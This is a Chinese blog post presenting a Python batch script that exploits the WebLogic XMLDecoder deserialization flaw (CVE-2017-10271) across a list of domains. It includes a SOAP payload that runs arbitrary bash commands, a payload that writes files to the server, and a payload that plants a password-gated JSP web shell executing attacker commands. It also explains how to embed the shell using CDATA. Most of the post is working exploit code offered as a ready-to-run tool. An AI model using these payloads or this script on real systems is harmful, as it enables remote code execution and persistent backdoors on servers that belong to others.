1、说明

看到大家对weblogic漏洞这么热衷,于是也看看这个漏洞的测试方式。

找了几个安全研究员的博客分析,经过几天的摸索大体清楚漏洞由XMLDecoder的反序列化产生。

漏洞最早4月份被发现,10月份的漏洞是由于官方修复不完善导致被绕过。

嗯,又学习了很多知识。

2、批量测试脚本

# -*- coding: UTF-8 -*-

import requests,sys,os

help = '''

eg:CVE-2017-10271.py "ping \`whoami\`.dnslog.cve"'''

domain_list = []                          # domain列表

#  CVE-2017-10271.py

#  authour:zzzhhh

#  2017-12-26

#  批量测试POC

# 验证函数

def poc_test(site,command):

    # HTTP头部信息

    headers = {

        'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',

        'Content-Type': 'text/xml'

    }

    # Getshell

    Getshell = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

     <soapenv:Header>

     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

     <java>

     <java version="1.4.0" class="java.beans.XMLDecoder">

     <object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/1000011.txt</string>

     <void method="println">

     <string>test hello!</string>

     </void>

     <void method="close"/>

     </object>

     </java>

     </java>

     </work:WorkContext>

     </soapenv:Header>

     <soapenv:Body/>

     </soapenv:Envelope>'''

    # Getshell2

    Getshell2 = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

     <soapenv:Header>

     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

     <java>

     <java version="1.4.0" class="java.beans.XMLDecoder">

     <object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.jsp</string>

     <void method="println">

     <string><![CDATA[<%

        if("023".equals(request.getParameter("pwd"))){

        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();

        int a = -1;

        byte[] b = new byte[2048];

        out.print("<pre>");

        while((a=in.read(b))!=-1){

            out.println(new String(b));

        }

        out.print("</pre>");

     }

     %>]]></string>

     </void>

     <void method="close"/>

     </object>

     </java>

     </java>

     </work:WorkContext>

     </soapenv:Header>

     <soapenv:Body/>

     </soapenv:Envelope>'''

    # HTTP主体内容

    console = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

     <soapenv:Header>

     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

     <java version="1.8.0_131" class="java.beans.XMLDecoder">

     <void class="java.lang.ProcessBuilder">

     <array class="java.lang.String" length="3">

     <void index="0">

     <string>/bin/bash</string>

     </void>

     <void index="1">

     <string>-c</string>

     </void>

     <void index="2">

     <string>%s</string>

     </void>

     </array>

     <void method="start"/></void>

     </java>

     </work:WorkContext>

     </soapenv:Header>

     <soapenv:Body/>

    </soapenv:Envelope>'''

    # URL拼接

    url = site + '/wls-wsat/CoordinatorPortType?wsdl'

    # 打印出执行的命令

    #print(command)

    # 异常处理,错误就提示,成功也提示

    try:

        req = requests.post(url, headers = headers, timeout=5, data = console % command)

        if('<faultcode>S:Server</faultcode><faultstring>0</faultstring>' in req.text):

            print site +  ' Success ! ' + command

            # Getshell  txt代码

            shell = requests.post(url, headers = headers, timeout=5, data = Getshell)

            # Getshell2   shell代码

            #shell = requests.post(url, headers = headers, timeout=5, data = Getshell2)

            print site +"/wls-wsat/1000011.txt"

            # http://xxx.xxx.xxx.xxx/wls-wsat/antiy.txt

            # http://xxx.xxx.xxx.xxx/wls-wsat/test.jsp?pwd=023&i=ls

            # 1000011.txt

        else:

            print site + ' Fail !'

    except:

        print site + ' Error ! '

#读取文件函数

def read_file(file_path):

    # 判断文件路径是否存在,如果不存在直接退出,否则读取文件内容

    if not os.path.exists(file_path):

        print 'Please confirm correct filepath !'

        sys.exit(0)

    else:

        with open(file_path, 'r') as source:

            for line in source:

                domain_list.append(line.rstrip('\r\n').rstrip('\n'))

if __name__ == '__main__':

    print(help)

    # 域名列表

    #file_str= raw_input('Input file ip.txt filepath eg:D:\\\\test.txt \n')

    file_str = "D:\\domain.txt"

    #poc_test("http://www.baidu.com", "whoami")

    # 执行命令

    #command = raw_input('Input command\n')

    command = "whoami"

    # 读取文件函数

    read_file(file_str)

    # 遍历域名组

    for domain in domain_list:

        poc_test(domain, command)

3、GETSHELL方式

确实需要上传文件测试危害,那么采用java.io.PrintWriter即可写入一个1000011.txt文件。

   # Getshell txt代码

   shell = requests.post(url, headers = headers, timeout=5, data = Getshell)

   # http://xxx.xxx.xxx.xxx/wls-wsat/1000011.txt

    # Getshell

    Getshell = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

     <soapenv:Header>

     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

     <java>

     <java version="1.4.0" class="java.beans.XMLDecoder">

     <object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/1000011.txt</string>

     <void method="println">

     <string>test hello!</string>

     </void>

     <void method="close"/>

     </object>

     </java>

     </java>

     </work:WorkContext>

     </soapenv:Header>

     <soapenv:Body/>

     </soapenv:Envelope>'''

写入WEBSHELL的时候会遇到错误,在 XML 元素中,"<" 和 "&" 是非法的。"<" 会产生错误,因为解析器会把该字符解释为新元素的开始。"&" 也会产生错误,因为解析器会把该字符解释为字符实体的开始。某些文本,比如 JavaScript 代码,包含大量 "<" 或 "&" 字符。为了避免错误,可以将脚本代码定义为 CDATA。CDATA 部分中的所有内容都会被解析器忽略。CDATA 部分由 "" 结束:

   # Getshell 代码

   #shell = requests.post(url, headers = headers, timeout=5, data = Getshell2)

   # http://xxx.xxx.xxx.xxx/wls-wsat/test.jsp?pwd=023&i=ls

    # Getshell2

    Getshell2 = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

     <soapenv:Header>

     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

     <java>

     <java version="1.4.0" class="java.beans.XMLDecoder">

     <object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.jsp</string>

     <void method="println">

     <string><![CDATA[<%

        if("023".equals(request.getParameter("pwd"))){

        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();

        int a = -1;

        byte[] b = new byte[2048];

        out.print("<pre>");

        while((a=in.read(b))!=-1){

            out.println(new String(b));

        }

        out.print("</pre>");

     }

     %>]]></string>

     </void>

     <void method="close"/>

     </object>

     </java>

     </java>

     </work:WorkContext>

     </soapenv:Header>

     <soapenv:Body/>

     </soapenv:Envelope>'''

4、参考分析文档

Weblogic XMLDecoder RCE分析

http://xxlegend.com/2017/12/23/Weblogic XMLDecoder RCE分析/

利用xmldecoder执行命令

http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html

反系列化利用

https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet

Weblogic 0day 复现

http://kylingit.com/blog/weblogic-0day-复现/index.html

POC

https://github.com/1337g/CVE-2017-10271/blob/0d9078fd532c65eb698933869db9b65ae9d66527/CVE-2017-10271.py

https://ob5vt1k7f.qnssl.com/weblogic.py

【Python】CVE-2017-10271批量自查POC(Weblogic RCE)的更多相关文章

  1. python操作数据库之批量导入

    python操作数据库之批量导入 Python语法简洁清晰,特色之一是强制用空白符(white space)作为语句缩进. Python具有丰富和强大的库.它常被昵称为胶水语言,能够把用其他语言制作的 ...

  2. Python实现邮件的批量发送

    Python实现邮件的批量发送 1 发送文本信息 '''加密发送文本邮件''' def sendEmail(from_addr,password,to_addr,smtp_server): try: ...

  3. Python之文件处理-批量修改md文档内容

    目录 Python之文件处理-批量修改md文档内容 Python之文件处理-批量修改md文档内容 #!/usr/bin/env python # -*- coding:utf-8 -*- import ...

  4. TriAquae 是一款由国产的基于Python开发的开源批量部署管理工具

    怀着鸡动的心情跟大家介绍一款国产开源运维软件TriAquae,轻松帮你搞定大部分运维工作!TriAquae 是一款由国产的基于Python开发的开源批量部署管理工具,可以允许用户通过一台控制端管理上千 ...

  5. Python 写了一个批量生成文件夹和批量重命名的工具

    Python 写了一个批量生成文件夹和批量重命名的工具 目录 Python 写了一个批量生成文件夹和批量重命名的工具 演示 功能 1. 可以读取excel内容,使用excel单元格内容进行新建文件夹, ...

  6. 2017.11.7 Python 制作EFM32/ AVR批量烧录工具

    Customer need program quickly asap. ok,I need to set up a table for test. 1 reference data http://ww ...

  7. Python实战 :2017国考职业表excel转数据库,再查询生成excel

    最近看2017年国考的职业表,多而杂,不好过滤我想要的信息,特此把它转成Sqlite3数据库,再从数据库里把查询结果导出成excel,方便找职业. (后附上整套代码) 环境:python2.7   x ...

  8. Python:使用pymssql批量插入csv文件到数据库测试

    并行进程怎么使用? import os import sys import time def processFunc(i): time.sleep(10-i) print i if __name__= ...

  9. 『Python』Python 调用 ZoomEye API 批量获取目标网站IP

    #### 20160712 更新 原API的访问方式是以 HTTP 的方式访问的,根据官网最新文档,现在已经修改成 HTTPS 方式,测试可以正常使用API了. 0x 00 前言 ZoomEye 的 ...

随机推荐

  1. LINUX内核分析第五周学习总结——扒开应用系统的三层皮(下)

    LINUX内核分析第五周学习总结——扒开应用系统的三层皮(下) 张忻(原创作品转载请注明出处) <Linux内核分析>MOOC课程http://mooc.study.163.com/cou ...

  2. Winform设置托盘程序,托盘显示

    1.拖一个NotifyIcon,一个ContextMenuStrip控件到主窗体中 2.设置notifyIcon1,一个contextMenuStrip1(如下图) Icon为托盘图标,Text托盘显 ...

  3. Linux 系统目录

    / 根目录 /bin 存放必要的命令 /boot 存放内核以及启动所需的文件等 /dev 存放设备文件 /etc 存放系统的配置文件 /home 用户文件的主目录,用户数据存放在其主目录中 /lib ...

  4. final评论1

    1-约跑APP 小组准备的非常的充分,还带了摄像头,发布过程清晰.团队的约跑项目界面相较于Beta版本进行了美化,增加了背景图片,使项目看起来更美观.同时项目支持聊天信息的接收和发送,个人觉得他们组的 ...

  5. js用currentStyle和getComputedStyle获取css样式(非行间) 兼容ie与火狐

    用js的style属性可以获得html标签的样式,但是不能获取非行间样式.那么怎么用js获取css的非行间样式呢?在IE下可以用currentStyle,而在火狐下面我们需要用到getComputed ...

  6. 模拟APP存储空间、内存不足情况下软件正常运行

    1.进行临界测试,手机盘空间存满的条件下应用会有何表现: 方法一:adb shell dd if=/dev/zero of=/mnt/sdcard/bigfile 方法二:哆啦A工具生成文件 2.内存 ...

  7. sniffer 和 debug flow

    sniffer 和 debug flow sniffer 和 debug flow 复制模板,直接修改IP即可使用: diagnose sys session filter clear diagnos ...

  8. 一台机子同时启动两个相同版本的tomcat

    其实我的机子之前是可以同时启动两个tomcat的,但是是两个不同版本的tomcat,一个是6.0,一个是7.0,我的环境变量都没有设置,所以我对解压过的tomcat唯一改动的就是在catalina.b ...

  9. 【Revit API】创建工作集并将element加入工作集中

    话不多说,直接上代码! public class WorkSetHelper { public void AddElementsToWorkSet(Document doc, List<Elem ...

  10. CentOS服务器配置SSH免密码登录

    由于工作需要,经常要登录到多台服务器远程操作,每次都是ssh user@host:port 再输入密码,时间长了,难免觉得乏味-- 故而从度娘那里扒来了一些让SSH免密码登录的办法,其实这也是使用Gi ...